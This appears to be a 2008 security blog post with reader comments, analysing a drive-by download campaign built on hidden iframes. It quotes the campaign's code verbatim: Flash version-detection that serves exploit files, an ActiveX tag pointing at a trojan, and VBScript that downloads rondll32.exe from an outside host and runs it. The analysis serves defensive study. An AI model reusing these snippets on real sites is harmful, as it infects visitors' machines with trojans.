«
»

jjmaobuduo.3322.org/csrss/w.js

a new round of attacks haveĀ  started.
w.js contains iframe src from http://www.plgou.com/csrss/htm.htm
htm.htm contains iframes from

  • <iframe src=flash.htm width=100 height=0></iframe>
  • <iframe src=06014.html width=100 height=0></iframe>
  • <iframe src=yahoo.htm width=100 height=0></iframe>
  • <iframe src=office.htm width=100 height=0></iframe>
  • <iframe src=ksx.htm width=100 height=0></iframe>

flash.htm calls i1.html if browser is MSIE, else call f2.html (presumably firefox). Depending on the flashplay version the respective flash exploit is retrieved:

var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){document.getElementById('flashversion').innerHTML="";if(version['rev']==115){var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}
document.write("")

Interesting content for ksx.htm:
<object classid="clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E" codebase="http://www.plgou.com/csrss/rondll32.exe#version=1,0,0,1" width="800" height="191"></object>

infrequently used clsid for downloading trojan.

office.htm contains snapshot viewer exploit.

yahoo.htm uses exploits Yahoo Messenger to download trojan:

<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "http://www.plgou.com/csrss/rondll32.exe","c:\\msyahoo.exe",5,1,"ti
any"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"c:\\msyahoo.exe"
</script>

This entry was posted on August 6, 2008 at 9:57 pm and is filed under sql injection . You can follow any responses to this entry through the RSS 2.0 feed You can leave a response, or trackback from your own site.

4 Responses to “jjmaobuduo.3322.org/csrss/w.js”

  1. Doug Says:
    August 7, 2008 at 2:25 am

    Do you have any information about what each of these trojans do?

    Reply
  2. Ilion Says:
    August 7, 2008 at 6:28 pm

    06014.html is 06014.htm . this is hackers mistake :)

    Reply
  3. s3cu Says:
    August 8, 2008 at 12:12 am

    the analysis of rondll32.exe is here

    Reply
  4. chris Says:
    August 25, 2008 at 7:52 am

    rondll32.exe will go out and grab ack.htm.
    ack.htm downloads 4 executables:
    beauty.exe
    sss.exe
    sl.exe
    fengxiang.exe

    Reply

Leave a Reply